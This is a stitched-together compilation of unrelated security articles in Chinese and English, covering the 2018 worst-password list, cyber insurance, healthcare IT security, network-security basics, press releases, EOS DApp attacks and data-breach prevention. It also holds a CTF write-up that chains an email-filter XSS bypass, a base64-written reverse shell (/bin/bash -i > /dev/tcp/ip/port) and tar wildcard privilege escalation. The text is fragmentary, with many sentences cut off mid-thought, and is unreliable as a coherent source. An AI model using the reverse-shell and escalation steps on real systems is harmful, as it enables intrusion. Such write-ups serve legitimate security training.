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德国网络安全监管机构联邦信息安全办公室(Federal Office for Information Security)对外媒表示,该机构正在与国际供应商合作,促进他们参与所谓的技术验证项目,包括对供应商总部、现有开发和安全设施,或欧洲各地专门实验室的监督。








Rank 2018 Password(前25)

1、123456 (无变化)

2、password (无变化)

3、123456789 (3)

4、12345678 (↓ 1)

5、12345 (无变化)

6、111111 (新出现)

7、1234567 ( 1)

8、sunshine (新出现)

9、qwerty (↓5)

10、iloveyou (无变化)

11、princess (新出现)

12、admin (↓ 1)

13、welcome (↓ 1)

14、666666 (新出现)

15、abc123 (无变化)

16、football (↓ 7)

17、123123 (无变化)

18、monkey (↓ 5)

19、654321 (新出现)

20、[emailprotected]#$%^&* (新出现)

21、charlie (新出现)

22、aa123456 (新出现)

23、donald (新出现)

24、password1 (新出现)

25、qwerty123 (新出现)




1. 使用12个以上的字母组合或多种类型组合的密码






美国卡内基国际和平基金会11月发布专题报告《解决私营部门网络安全困境:保险不可或缺的作用》(Addressing the Private Sector Cybersecurity Predicament: The Indispensable Role of Insurance)。报告指出,私营部门面临的网络风险日益严峻,表现在范围、规模和复杂性等方面,但应对之道非常有限,企业开始转向网络保险政策以应对挑战。然而,目前网络保险仅可提供有限的、不确定的、临时的解决方案,保险业在重塑风险格局方面理应极具潜力。本报告分析了阻碍网络安全保险市场正常运作的因素,研究了保险行业、政府、信息和通信技术(ICT)供应商以及私营部门的其他主要利益相关者为充分发挥保险重塑风险环境的潜力而做出的努力,最后探讨了释放网络安全保险潜力可施行的措施。




































五、网络风险保险难在哪里 (一)保险产品演化的现实局限



此外,保险业极少应对以网络为中心的挑战,其风险随时可能发生巨大变化。网络风险的独特性使得是否有能力满足 “可保性原则”充满争议。云服务和作为攻防措施引入的机器学习这两个颠覆性技术可让保险公司更难以应对风险敞口。因此,传统的覆盖率和费率方法将不再适用于网络风险,观察和分享前沿最佳实践是促成网络风险易于管理的最好方法。







六、网络的保险行业如何释放 其真正的潜力













(三)确保ICT / ICS供应链的完整性

ICT和ICS供应商必须承担一定的责任,确保其产品在整个生命周期内的完整性,该义务要求供应商承诺对其产品承担某些义务以及具体措施和指标,以增强对此类承诺的更广泛信任。确保ICT / ICS产品完整性的可验证的承诺和指标,将大大缓解保险公司对其是否能充分评估网络风险和预测风险集聚的能力的担忧。此外,这些供应商和保险公司之间为实施此类措施而进行的深入合作可以为后者提供衡量风险暴露和缓解的具体指标。

八、结论:在政府,保险业和企业之间 建立合作伙伴关系



编译 | 贺佳瀛





医疗行业面对的所有攻击中,勒索软件最近上升为最令人恐惧的黑客技术。该技术能让黑客封锁数据访问,要挟医院支付赎金。最近一项研究的数据表明, 88% 的勒索软件攻击是朝着医院去的。这一行业的另一个数据泄露风险来自于安全防护不周的IoT设备和人为失误。这些因素再加上HIPPA和其他监管规定对医疗健康信息保护提出的要求,医疗健康机构要确保患者安全与隐私就有了很多必须及时解决的重大安全考虑。




定制市场研究与咨询服务提供商 TMR Research 针对医疗保健IT安全市场制作了一份全球行业分析与预测报告,细致呈现了当前全球医疗保健IT安全市场的成长动态,包含2016-2024期间有关该市场增长前景的大量预测。报告中含有主要细分市场及其估值的定性定量分析,还有上述时间区间内的预期增长率及各地区性市场的总体吸引力。









全球医疗保健IT安全市场竞争激烈,呈现群雄逐鹿的分裂状态,没有哪家大供应商占据主要市场份额的情况。该市场中几家主流公司是英特尔、SailPoint Technologies、赛门铁克、惠普、AT&T、易安信、IBM、Wipro和威瑞森。

TMR Research 报告获取地址:


Using ATT&CK As a Teacher


Over the past few years , I’ve had the pleasure of welcoming interns on our security research team. One of my goals was to pass on knowledge of security to these folks and pique their interest in (a career in) security. The goal of any teacher is to pass on their knowledge to the younger generation, in essence creating a miniature version of ourselves, which is hopefully somewhat better.

Let me take you back in time to 2015 when we had our first round of interns. I had the bright idea to go full-throttle. We loaded up Kali linux , launched a Damn Vulnerable Web App instance, started scanning with OpenVAS and NMAP and then used Metasploit to attack everything we could. The problem with this was that these young interns had no experience in security. Their eyes were the size of saucers, and they walked around looking confused.

The next two years, I reeled it in a bit and started with essentially having them complete a book report on that year’s Verizon Data Breach Investigations Report . What I wanted them to understand was some of the key terms in security, how attackers work, what attackers are after and what defenses organizations are using to protect against these attacks.

Once this was complete, I kicked them out of the building. I had them run through a scenario of needing to gain access to an encrypted file on their computer back at their desk. Starting from the street corner, I had them provide a report of every security control they encountered on their way to the text in that encrypted file. These could be mitigating controls, such as door locks, security guards or passwords on the computer. They could also be deterring controls, such as video cameras. Nobody ever gets every (Read more...)

What is Network Security: An introduction to Network Security


We live in an age of information. Businesses these days are more digitally advanced than ever, and as technology improves, organizations’ security postures must be enhanced as well. Now, with many devices communicating with each other over wired, wireless, or cellular networks, network security is an important concept. In this article, we will explore what is network security and its key features.

Let’s take a look at the topics covered in this ‘What is Network Security?’ article:

What is network security? What is network security attack? Types of network security Network security jobs What is Network Security?

Network security is the process of taking preventative measures to protect the underlying networking infrastructure from unauthorized access, misuse, malfunction, modification, destruction or improper disclosure.

The Internet has undoubtedly become a huge part of our lives. Many people in today’s generation rely on the Internet for many of their professional, social and personal activities. But are you sure your network is secure?

There are many people who attempt to damage our Internet-connected computers, violate our privacy and make it impossible to the Internet services. Given the frequency and variety of existing attacks as well as the threat of new and more destructive future attacks, network security has become a central topic in the field of cybersecurity.Implementing network security measures allows computers, users and programs to perform their permitted critical functions within a secure environment.

Now that we know what network security is, let’s take a look at two major categories of network attacks.

Network Security | Introduction to Network Security | Edureka

What is network security attack?

A network attack can be defined as any method, process, or means used to maliciously attempt to compromise network security. Network security is the process of preventing network attacks across a given network infrastructure, but the techniques and methods used by the attacker further distinguish whether the attack is an active cyberattack, a passive type attack, or some combination of the two.

Let’s consider a simple network attack example to understand the difference between active and passive attack.

Active Attacks

An active attack is a networkexploit in which attacker attempts to make changes to data on the target or data en route to the target .

What is Network Security: An introduction to Network Security

Meet Alice and Bob. Alice wants to communicate to Bob but distance is a problem. So, Alice sends an electronic mail to Bob via a network which is not secure against attacks. There is another person, Tom, who is on the same network as Alice and Bob. Now, as the data flow is open to everyone on that network, Tom alterssome portion of an authorized message to produce an unauthorized effect.For example, a message meaning “Allow BOB to read confidential file X” is modified as “Allow Smith to read confidential file X”.

Active network attacks are often aggressive, blatant attacks that victims immediately become aware of when they occur. Active attacks are highly malicious in nature, often locking out users, destroying memory or files, or forcefully gaining access to a targeted system or network.

Passive Attacks

A passive attack is a network attack in which a system is monitored and sometimes scanned for open ports and vulnerabilities,but does not affect system resources.

Let’s consider the example we saw earlier:

What is Network Security: An introduction to Network Security

Alice sends an electronic mail to Bob via a network which is not secure against attacks. Tom, who is on the same network as Alice and Bob, monitors the data transfer that is taking place between Alice and Bob. Suppose, Alice sends some sensitive information like bank account details to Bob as plain text. Tom can easily access the data and use the data for malicious purposes.

So, the purpose of the passive attack is to gain access to the computer system or network and to collect data without detection.

So, network security includes implementing different hardware and software techniques necessary to guard underlying network architecture. With the proper network security in place, you can detect emerging threats before they infiltrate your network and compromise your data.

Cybersecurity Certification Course

Types of network security

There are many components to a network security system that work together to improve your security posture. The most common network security components are discussed below.

Access Control

To keep out potential attackers, you should be able to block unauthorized users and devices from accessing your network.Users that are permitted network access should only be able to work with the set of resources for which they’ve been authorized.

Application Security

Application security includes the hardware, software, and processes that can be used to track and lock down application vulnerabilitiesthat attackers can use to infiltrate your network.


A firewall is a device or service that actsas a gatekeeper,decidingwhat enters and exits the network. They use a set of defined rules to allow or block traffic.A firewall can be hardware, software, or both.

Virtual Private Networks(VPN)

A virtual private network encrypts the connection from an endpoint to a network, often over the Internet. This way it authenticates the communication between a device and a secure network, creating a secure, encrypted “tunnel” across the open internet.

Behavioral Analytics

You should know what normal network behavior looks like so that you can spot anomalies or network breaches as they happen.Behavioral analytics tools automatically identify activities that deviate from the norm.

Wireless Security

Wireless networks are not as secure as wired ones.Cybercriminals are increasingly targeting mobile devices and apps. So, you need to control which devices can access your network.

Intrusion Prevention System

These systems scan network traffic to identify and block attacks, often by correlating network activity signatures with databases of known attack techniques.

So, these are some ways of implementing network security. Apart from these,you’ll need a variety of software and hardware tools in your toolkit to ensure network security, those are:

Firewalls Packet crafters Web scanners Packet sniffers Intrusion detection system Penetration testing software Network security is essential for overall cybersecurity because network is a significant line of defense against external attack.Given that, virtually all data and applications are connected to the network, robust network security protects against data

South Yorkshire TravelMaster Selects Rambus To Deliver Innovative E-Commerce Tic ...

New retail portal, on-vehicle and NFC-based digital ticket delivery
part of improved service offering
South Yorkshire TravelMaster Selects Rambus To Deliver Innovative E-Commerce Tic ...
GLASGOW, Scotland & SHEFFIELD, England (BUSINESS WIRE) lt;a href=”https://twitter.com/hashtag/DataFasterSafer?src=hash” target=”_blank”gt;#DataFasterSaferlt;/agt;


. (NASDAQ: RMBS) today announced that TravelMaster ,

the commercial organisation responsible for delivering and managing

multi-operator and integrated ticketing in South Yorkshire, has selected



to deliver a multi-operator smart ticketing

solution. The new, innovative smart ticketing system will allow

TravelMaster customers to purchase ticketing products online and reap

the benefits of smart ticketing whilst travelling across buses, trams

and trains in South Yorkshire.

Rambus has extensive experience in delivering robust and scalable smart

ticketing solutions which act as the backbone for deployments across the

UK for bus, rail, subway and metro. Under this five-year agreement,

Rambus will provide a


with web retail and smart ticket collector app, to

enable the secure delivery of digital smart tickets directly to tablets

and mobile devices.

The solution will allow customers to purchase a range of flexible

multi-operator tickets, valid on any bus, tram or train throughout South

Yorkshire, online and in-advance through a retail portal on the

TravelMaster website. These tickets can then be loaded onto a smart card

via on-vehicle ticketing machines or through NFC-enabled and compatible

smart phones.

“Our customers rightly expect to be able to purchase our great range of

value for money products at their own convenience and this appointment

is a major step towards TravelMaster meeting those expectations,” said

Matt Smallwood, general manager of TravelMaster. “We’re one of the

leading smart ticketing schemes in the UK and with the pedigree Rambus

have in this field we will be able to deliver an innovative, accessible

and enhanced way for our customers to purchase their products.”

TravelMaster’s e-Commerce system is a key part of the company’s retail

strategy, which intends to support patronage growth, enhanced access to

opportunities and economic development within the Sheffield City Region.

By implementing commercially sustainable, customer-oriented,

technologically innovative and integrated ways of selling and fulfilling

products, TravelMaster and Rambus will together support a brighter

future for South Yorkshire.

Russell McCullagh, vice president and general manager of Rambus

Ticketing, commented: “For operators looking to provide a modern,

frictionless transport experience that customers can rely on, smart

mobile ticketing is the answer. We’re delighted to be working with

TravelMaster and look forward to delivering a truly reliable ticketing

experience for passengers which will create improved services and ticket


TravelMaster intends to deploy the new e-Commerce system in the first

half of 2019.

For more information on the TravelMaster system, visit http://sytravelmaster.com/ .

Visit rambus.com/smart-ticketing

for additional information on Rambus Smart Ticketing solutions.

Follow Rambus:

Company website: rambus.com


blog: rambus.com/blog

Twitter: @rambusinc

LinkedIn: www.linkedin.com/company/rambus

Facebook: www.facebook.com/RambusInc

About Rambus Security

Rambus Security is dedicated to providing a secure foundation for a

connected world. Our innovativesolutionsspan areas including tamper

resistance, network security,mobilepayment, smart ticketing

andtrustedtransaction services. Rambus foundational technologies

protect nearly nine billion licensed products annually, providing secure

access to data and creatingan economy of digital trustbetween our

customers and their customer base. Additional information is


Zero-Touch Provisioning with Patrick Ogenstad (Part 2)


Last week we published thefirst half of interview withPatrick Ogenstad, guest speaker in Spring 2019 Building Network Automation Solutions online course (register here). Here’s the second half.

ZTP is about provisioning. Can this include configuration as well?

You could argue that provisioning is a form of configuration and in that sense, provisioning can certainly include configuration. If your ZTP solution is good at configuration management is another question.

I would say that the goal of the ZTP system should be to get the device in a state so that it can be handed over to the configuration management system. It might be that you use the same tool for everything. There are rather few tools out there, however, which are a master of all trades.

ZTP can be used internally connecting to an internal provisioning server, and it can be used externally connecting to an external provisioning server. Some commercial products use ZTP in connection with a vendor-controlled cloud-based provisioning server. What are the security risks if a vendor can push data to customer equipment?

Microsoft had a great article many years ago called Ten Immutable Laws of Security, in which one of those laws state that a computer is only as secure as the administrator is trustworthy. I'm not trying to say that the operators behind these solutions are untrustworthy, just that each organization has to take into account who they trust with what.

There will always be security risks involved regardless of what we do. The attack surface will be different against a service like this; on the other hand, it doesn't mean that it is worse than what most companies have today. A cloud-based service can be helpful to set up a new office where you don't have a network in place. However, as mentioned hereinabove, it still requires that the Internet connection uses DHCP, if we want to keep it as a ZTP install that is.

What tools are available to develop a ZTP solution?

If we are talking about creating a custom solution, there are a lot of open source tools that can serve as a base. DHCP will be needed, so ISC DHCP or Kea are good alternatives. For devices that support ZTP using a web server, Nginx could be helpful to serve files, but you can also write your web application using Flask or Django.

I would, however, recommend starting by stepping away from all of the tools and instead look at the process that you currently use to install devices. Not just getting the initial configuration on the box after it has powered up. Look at what steps need to get done for the new device to work as intended. That the device has the correct configuration is one thing, but it might also mean that it gets added to a network monitoring system. Start by writing all the steps that need to get done and then look at what tools can solve those problems.

Are there any standards yet?

While DHCP and TFTP have been around a long time as regards ZTP, there has as far as I know never been a standard discussion specifically about how to provision devices. However, looking into the future, there is an IETF draft called Zero Touch Provisioning for Network Devices (https://datatracker.ietf.org/doc/html/draft-ietf-netconf-zerotouch) that looks interesting. I wouldn't dare to guess as to when we might have devices that would support that concept.

How would you start and structure a ZTP project?

I would start by writing down all the manual steps needed to install a new device and integrate it into the network. Hopefully, I would have colleagues to talk to about this as I'm bound to miss some of the steps.

Then, I would look at each task and try to find a solution that could automate that step. If I couldn't get my hands on a tool for a specific part, I would write my own. I would start by trying to solve the easy problems first and be happy even if the ZTP solution would require a few manual steps to begin with and then work from there to improve it.

Want to know more? Patrick will talk about ZTP in Spring 2019 Building Network Automation Solutions online course (register here). In the meantime, enjoy his ZTP tutorial .

The Rise and Fall of Enterprise Security Technology


Over the past few years “security” has become a buzzword across many industries, and for good reason. With the threat of data breaches haunting industry stalwarts, household brands and countless consumers, companies are paying more and more attention to their in-house security strategies.

To be smart about security, IT professionals need to think like a detective. We need to think like the “bad guys” to protect the “good guys,” and identify weaknesses before they are exposed.

Recent Articles By Author

6 Ways to Improve Your Security Posture Using Critical Security Controls
The Rise and Fall of Enterprise Security Technology

However, more than 315 technology and security professionals surveyed in the 2018 Black Hat attendee survey revealed that when it comes to defending against cyberattacks, only three types of technologies were rated as “very effective” or “somewhat effective” by a majority of participants: encryption, multi-factor authentication tools and firewalls. The remaining technologies―including mobile security tools and data leak protection―were ranked “effective” by fewer than half the respondents. Passwords, perhaps the most universal of security technologies, were rated “effective” by only 19 percent of security professionals and “ineffective” by 37 percent.

Despite the broad availability of security technologies, there has been a rise and fall in the effectiveness of certain technologies, as the broader landscape shifts and hackers get smarter. Exploring the available security technology through the eyes of “on the ground” technology and security professionals better enables us to identify why the three leading tools earned their recognition as most effective―and how the industry is effecting that change.

The Modern IT Landscape

New technologies such as artificial intelligence (AI), machine learning and hybrid cloud have significantly influenced the effectiveness of security strategies that may have been successful just five years ago. While IT teams are eager to implement new technologies, they cannot allow their security practices to fall by the wayside―in lockstep with the introduction of next-generation technology, some security practices have become obsolete in turn.

Modern security strategies must remain fluid: Treating your security practices as an afterthought can be dire for an organization in the modern IT landscape.

However, many organizations may be unsure where to start when it comes to security processes, protocols and figuring out which technologies are best for their businesses. Smaller organizations specifically may not have a full-time security officer, but it is important to have a member of the IT team trained in security or a contractor who can assess the current status of the security practices and determine where the weakest links are. Once the assessment is complete, it should be clear which security strategies should be implemented. Following a companywide security audit, for example, you can decide if dual authentication is needed in the sales department or if encryption is needed in finance. Security plans are not one-and-done, they should evolve as you assess your business’ needs and the changing technology landscape.

The Tools of the Trade

While a strong security strategy is comprehensive, three technologies emerged as leading underlying protocols in 2018―encryption, multi-factor authentication and firewalls―and are crucial assets to any cybersecurity arsenal.

Encryption : Many federal organizations have been successfully using encryption for years. IT organizations should consider it as part of their security plan as well. Even when implemented at the most basic level, encryption can be a great asset for a company. If a company laptop is stolen, for example, the private, proprietary company information stored on that device can be subject to exposure. The laptop user may believe they’re doing well at keeping their documents and personally identifiable information secure, but we all know how easy it is to make errors, such as saving a document in an insecure place. Encryption can act as a safety net: The processing power needed to even try to break encryption is extremely challenging and is a lengthy process, so while a file might be in plain sight, a thief will not be able to access the data and it will be rendered useless to them. Multi-factor Authentication: Long gone are the days when your primary device password could be your favorite color in all lowercase. Truthfully, you shouldn’t just have one password anymore. Most security questions can be easily guessed or researched now: a quick online search can lead hackers directly to your mother’s maiden name or your high school mascot. The extra layer of security provided by a multi-factor authentication tool is necessary in 2018. With multi-factor authentication another layer of security is added, whether it’s a token or a four-digit code sent to you via an approved communications channel (email, text or even a mobile push authentication tool). It’s another way the good guys have outsmarted the bad. Firewalls : Firewalls remain a leading, effective security technology. Firewalls have been around since the 1980s and are still an excellent defense for an IT team. With a firewall you can create rules, stay on top of controls, filter traffic and keep people within the organization safe. Staying Ahead of the Game

While encryption, multi-factor authentication and firewalls are all excellent security management tools , there is one other invaluable tool―user education. As they often say in sports, “Your best defense is a good offense.” User education should be viewed as an investment in your IT organization. Almost every company now has a budget devoted to security, but rather than spending it all on hardware, it’s important to spend some on helping your teams understand risks and best practices. Humans are often security’s weakest link. Understanding how to create a smart password or when not to click on an email can make a world of difference in an organization’s success when it comes to security.

With today’s ever-changing technology landscape, it’s more important than ever to stay aware and educated on current security trends, as well as those that have been rendered ineffective. A flexible and custom security plan that is maintained regularly can be invaluable in today’s technology climate.

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互联网上半场基本上都在做to C的应用,通过互联网改变每个人的生活。到了下半场,有一些新的机会比较成熟,我称之为“IMABCD”。

I是IoT,就是物联网;M是Mobile,移动通信;A是AI;B是Blockchain,区块链技术;C是Cloud,云技术;D是Big Data,大数据。




产业互联网给360提供了两个机会,第一,这些to B的系统都信息化、数字化了,他们的安全谁来管。360早就从一个只提供免费杀毒、拦截骚扰电话的面向消费者的安全厂商转变成一个面对政府、国家、企业、世界,全方位提供安全服务的厂商。















在8月底,随着EOS DApp的兴起,EOS的交易额首次超过ETH,并保持着强劲的增长速度。反观ETH,在爆款“博彩”游戏Fomo3D的催化下,ETH的交易额在7月20日拉出一波最高点。随后在经历了Fomo3D带来的短暂繁荣之后,ETH无论是从活跃度还是交易额都回落至一个地位,并且在后续几个月内没有发生明显的波动。



从交易次数方面来讲,ETH的每秒交易次数(TPS) 理论峰值是25次/秒,但是在2018年1月1日~11月22日之间,ETH的TPS平均值8.15次/秒,远远低于预期。所以ETH在TPS的限制下,Fomo3D所引起的交易额的暴增,并没有同时引发交易量的变化,ETH链上的交易量一直在低位平稳运行。










EOS DApp 安全事件列表

安全公司PeckShield安全专家施华国向链得得说道,EOS生态刚起步才不到6个月,EOS系统还在逐步完善改进,系统本身也会存在漏洞,从开发者的角度看,DApp 对于所有开发者来说都是全新的,尤其是合约使用C++语言开发,上手难度更大,更容易出现各种逻辑处理不严谨的问题。


EOS随着DApp的开发逐渐升温。在10月26日,BetDice和EOSTiger的DAU(日活跃用户数量)均超过3万,而当时全网的DAU也只有6万多,也就是说两个游戏DAU之和超过了全网EOS 活跃用户数总和。“两个游戏用户一定会有大量重复,而EOS区块链生态会不会也跟互联网一样存在假量数据呢?”




统计时间的最后一天两个数据对比,活跃账号DAU是3万,全部账号DAU是6万6,群控账号DAU 占了全部DAU的一大半,也就是说群控账号的DAU大于真实玩家。


EOS在11月份的时候发生一起针对于游戏项目EOS WIN的攻击事件:攻击者为了完成随机数漏洞攻击,总共用6个账号部署了6个合约并行进行攻击,1分钟内获利9000EOS,这个案例也是目前为止攻击事件里攻击手段最复杂的一起攻击事件。施华国表示,未来攻击手段会越来越复杂和多样化。



在EOS上转账交易与运行智能合约并不需要消耗EOS代币。但是在EOS系统当中,有三大类资源被应用程序消耗:RAM(内存)、网络带宽(Network Bandwidth)、CPU带宽(CPU Bandwidth)。





swpu ctf 有趣的邮箱注册 详细题解


swpu ctf 有趣的邮箱注册 详细题解





swpu ctf 有趣的邮箱注册 详细题解


swpu ctf 有趣的邮箱注册 详细题解

于是开始尝试在email处尝试xss,经过google,发现了几种绕过,尝试了一下,发现只要使用 "poc"@qq.com 类似的方法,就可以绕过过滤,然后构造xss的payload如下:

swpu ctf 有趣的邮箱注册 详细题解


swpu ctf 有趣的邮箱注册 详细题解
攻击local web



swpu ctf 有趣的邮箱注册 详细题解


swpu ctf 有趣的邮箱注册 详细题解


swpu ctf 有趣的邮箱注册 详细题解


swpu ctf 有趣的邮箱注册 详细题解





echo 'bHM=' | base64 -d > /tmp/xjb.sh

这个办法能很好的绕过很多编码,同理我们只要将 /bin/bash -i > /dev/tcp/ip/port 0<&1 2>&1 编码一下,然后放到上面的命令中,就可以成功将反弹shell的命令写入到文件中。


/bin/bash /tmp/xjb.sh


swpu ctf 有趣的邮箱注册 详细题解



swpu ctf 有趣的邮箱注册 详细题解


swpu ctf 有趣的邮箱注册 详细题解

只有backup.php 可以看,代码如下:

swpu ctf 有趣的邮箱注册 详细题解



既然现在我们没有办法直接读取flag,那就只能让flag用户或者高权限用户帮我们读了,看了看这个tar命令,总觉得不对,在搜索中发现利用tar来提权执行脚本的操作,具体文章戳 这里 .


swpu ctf 有趣的邮箱注册 详细题解


swpu ctf 有趣的邮箱注册 详细题解


swpu ctf 有趣的邮箱注册 详细题解

其中1.sh 的内容是:

swpu ctf 有趣的邮箱注册 详细题解

只要访问backup.php ,即可成功触发漏洞,获取flag

swpu ctf 有趣的邮箱注册 详细题解
swpu ctf 有趣的邮箱注册 详细题解

题目做完,思路可以总结为 bypass FILTER_VALIDATE_EMAIL然后xss,攻击只有本地才能访问的local web应用,从而拿到机器shell,然后继续攻击内网web题目,使用tar提权查看flag,确实学到了不少东西,如果有别的思路可以同样交流探讨。

Fundamental Shifts In 2018


What surprised the industry in 2018? While business has been strong, markets are changing, product categories are shifting and clouds are forming on the horizon.

As 2018 comes to a close, most companies are pretty happy with the way everything turned out. Business has been booming, new product categories developing, and profits are meeting or beating market expectations. “2018 was indeed an exciting year for semiconductors, with growth in almost every sector and application,” notes Tom Wong, director of marketing for design IP atCadence. “According to WSTS, worldwide semiconductor revenue will hit approximately $478 billion in 2018. This is an increase of 15.9% from 2017.”

New technologies are becoming mainstream. “2018 was surprisingly surprising,” says Thomas Uhrmann, director of business development at EV Group. “It was a strong year across a wide swath of technology. Optical sensing was very strong, but that was expected. The first major products are booming in the market now. Apple’s face ID had a large impact on this market. Customers are now forming consortia right and trying to prepare for the future.”

However, the warning signs on the horizon are growing. Capital spending is slowing, inventory is rising, and a trade war with China shows no sign of abatement. All of those can be highly damaging. Nobody wants to talk publicly about those possibilities yet, but they are beginning to tilt the outlook for 2019.

Artificial intelligence
Fundamental Shifts In 2018

Meanwhile, in 2018, artificial Intelligence (AI) is perhaps the buzzword for the year. Lauro Rizzatti, a verification consultant agrees. “Artificial intelligence,machine learning (ML) anddeep learning became the industry’s words of the year in 2018 and created intriguing areas where startups are making inroads in innovative ways. Neural network acceleration, for example, got a lift from a software stack that sits atop anFPGA, optimizing its performance and concealing the FPGA programming from the user to ease deployment.”

Nobody gets an award for having seen this trend. “We were right that AI would rapidly expand to consume all industry sectors, but this wasn’t a hard one to predict―AI is ‘the’ hot topic in technology,” says Simon Forrest, director of Connectivity & Connected Home at Imagination Technologies . “Cloud AI has certainly made strides in 2018, but many companies also used AI in name alone as a massive marketing tool. Many are not using AI in the truest sense of the word. The majority are exploiting pattern-matching algorithms alongside big data analytics, then claiming it as AI. This resulted in ‘IoT’ largely being replaced by ‘smart technology’, with that smartness implying some form of AI.”

The fall of another area also is helping. “In 2018, we saw the slowdown in bitcoin mining and its impact on the foundry and crypto SoC business,” says Wong. “But don’t worry, the industry is very resilient and is already moving to the next big thing―ML/AI SoCs. Just look at the VC activities in the U.S. and China and you will get the picture.”

The rise in development of special accelerator chips for the Cloud is also interesting. These chips defy the rules in some sense because they are being designed and built to sell services offered by the same company that is developing them.


But not everything was great in 2018. “It’s fair to say that augmented reality (AR) didn’t really move forward much in 2018,” says Forrest. “Mass market adoption of AR glasses depends on the need to be reasonably priced. The glasses themselves also need to be sleeker in design, while issues with battery life still need to be addressed. The potential is certainly there for AR, but its success is unfortunately tied into the success of wearable displays in general and will get thwarted somewhat in 2019 by the continued disillusionment with virtual reality (VR).”

Wong agrees. “AR/VR did not quite make it to the party. While a few high-end phones support AR/VR, most of them are still a work in progress.”

Everyone knows that mobile phones are no longer the growth leader, but 2018 was the wakeup call on that front. “I had predicted smartphone shipments would reach 1.6 billion units in 2018, compared to worldwide shipments of 1.472 billion units in 2017,” says Wong. “Unfortunately, the market was not that kind. Right now, it appears the smartphone market will close 2018 with worldwide shipments of about 1.5 billion units. I thought we would have some growth in 2018, but worldwide unit shipments were flat. This is clear confirmation that the worldwide smartphone market is saturated. Even in China, unit sales in 2018 came in below unit shipments in 2017. We also witnessed a change in ranking for top-tier suppliers and saw a strong showing by Vivo, OPPO and Xiaomi in China. All of these mid-priced Chinese smartphones have really good industrial designs and premium features. I had predicted Xiaomi would go public in 2018 with a valuation of $60 billion (USD). Well, Xiaomi did go public on the Hong Kong Stock Exchange during the summer of 2018, but at a valuation of $54 billion.”

Foundry changes

2018 brought major change to foundries, as well. “The most interesting news this year is the announcement byGlobalFoundries that they are stop development of 7nm and any advanced node after 7nm,” says Navraj Nandra, senior director of product marketing for the Solutions Group atSynopsys. “In the past there was always Intel, GF, Samsung, TSMC, with fairly well mapped out development paths. GF has said it is expensive and that they were not seeing the return.”

The industry has been talking about an increasing percentage of designs staying on older nodes.“GlobalFoundries has seen a sweet spot for their business at 14nm and 28nm/22nm, especially withFD-SOI,” adds Nandra. “They have found a niche in specialty technologies, and the mainstreamfinFET node right now is 16/14/12. GF is a substantial provider at that node. Analog and RF will become their focus. The opportunity is rich with all of the interest in IoT (edge or Industrial) that use these types of technologies. Automotive there are customers wanting 28nm, and FD-SOI is interesting here.”

Competition is heating up on older nodes, as well, as both demand and capacity continue to grow. “China is still behind in semiconductors,” says EV Group’s Uhrmann. “A lot of fabs are being built and a lot of 300mm capacity is coming online. We are seeing China acquire a lot of technologies. People are getting worried about a trade war, and so are reconsidering joint ventures. We already see a lot of our customers re-concentrating efforts back to the U.S.”

With foundries revamping old nodes, the rate at which new processes are being released is accelerating. Many of these are focused on particular industries, such asIoT or automotive. This is putting a strain on theIP industry.

“In the past you were developing one USB that covered multiple market segments or one DDR,” explains Nandra. “You now have a dedicated USB 2 for IoT and one for consumer of mobile. And if you look at how the IP is designed, even though the electrical specifications are the same, the actual layout looks different. It is no longer a certainty that if you build a piece of IP on a certain process that you will get a lot of customers.”

The IP industry itself is being shaken up by the introduction of the RISC-V open source instruction-set architecture (ISA). “I tend to underestimate how big momentum is,” says Krste Asanovic, professor at UC Berkeley and chief architect forSiFive. “Even though I am enthusiastic and believe that it is doing really well, it always

Types of Data Breaches and How To Prevent Them


Data breaches happen practically every day. Personal, including financial and medical data leak to cyber criminals as well as intelligence agencies. Some notable breaches include the Equifax breach, where dozens of personal data fields were leaked, and the recent Marriott breach , where passports, credit cards and locations of people at a given time were breached.

I’ve been doing some data protection consultancy as well as working on a data protection product and decided to classify the types of data breaches and give recommendations on how they can be addressed. We don’t always get to know how exactly the breaches happen, but from what is published in news articles and post-mortems, we can have a good overview on the breach landscape.

Control over target server if an attacker is able to connect to a target server and gains full or partial control on it, they can do anything, including running SELECT * FROM ... , copying files, etc. How do attackers gain such control? In many ways, most notably RCE (remote code execution) vulnerabilities and weak admin authentication.

How to prevent it? Follow best security practices regularly update libraries and software to get security patches, do not run native commands from within the application layer, open only necessary ports (80 and 443) to the outside world, configure 2-factor authentication for administrator login. Aim at having an intrusion detection / prevention system . Encrypt your data, and make the encryption as granular as possible for the most sensitive data (e.g. for SentinelDB we utilize per-record encryption) to avoid SELECT * breaches.

SQL injections this is a rookie mistake that unfortunately still happens. It allows attackers to manipulate your SQL queries and inject custom bits in them that allows them to extract more data than they are supposed to.

How to prevent it? Use prepared statements for your queries. Never ever concatenate user input in order to construct queries. Run regular code reviews and use code inspection tools to catch such instances.

Unencrypted backups the main system may be well protected, but attackers are usually after the weak spots. Storing backups might be such if you store unencrypted backups that are accessible via weak authentication (e.g. over FTP via username/password), then someone may try to attack this weaker spot. Even if the backup is encrypted, the key can be placed alongside it, which makes the encryption practically useless.

How to prevent it? Encrypt you backups, store them in a way that’s as strongly protected as your servers (e.g. 2FA, internal-network/VPN only), and have your decryption key in a hardware security module (or equivalent, e.g. AWS KMS).

Personal data in logs another weak spot other than the backups may be your logs. They usually lie on separate servers, and are not as well guarded. That’s usually okay, since logs don’t contain personal information, but sometimes they do. I recently stumbled upon a large company’s website that had their directory structure unprotected and they kept their access logs files alongside their static resources. In addition to that, they passed personal information as GET parameters, so you could get a lot of information by just getting the access logs. Needless to say, I did a responsible disclosure and the issue was fixed, but it was a potential breach.

How to prevent it? Don’t store personal information in logs. Avoid submitting forms with a GET method. Regularly review the code to check whether personal data is not logged. Make sure your logs are stored in a way as protected as your production servers and your backups. It could be a cloud service, it could be a local installation of an open source package, but don’t overlook the security of the log collection system.

Data pushed to unprotected storage a recent Alteryx/Experian leak was just that data placed on a (somewhat) public S3 bucket was breached. If you place personal data in weakly protected public stores (AWS S3, file sharing services, FTPs), then you are waiting for trouble to happen.

How to prevent it? Don’t put personal data publicly. How to prevent that from happening always review your S3 buckets and FTP servers policies. Have internal procedures that disallow sharing personal data without protecting it with at least a password shared by a side-channel (messenger/sms).

Unrestricted API calls that’s what caused the Facebook-Cambridge Analytics issue. No matter how secure your servers are, if you expose the data through your API without access restriction, rate-limiting, fraud-detection, audit trail, then your security is no use someone will “scrape” your data through the API.

How to prevent it? Do not expose too much personal data over public or easily accessible APIs. Vet API users and inform your users whenever their data is being shared with third parties, via API or otherwise.

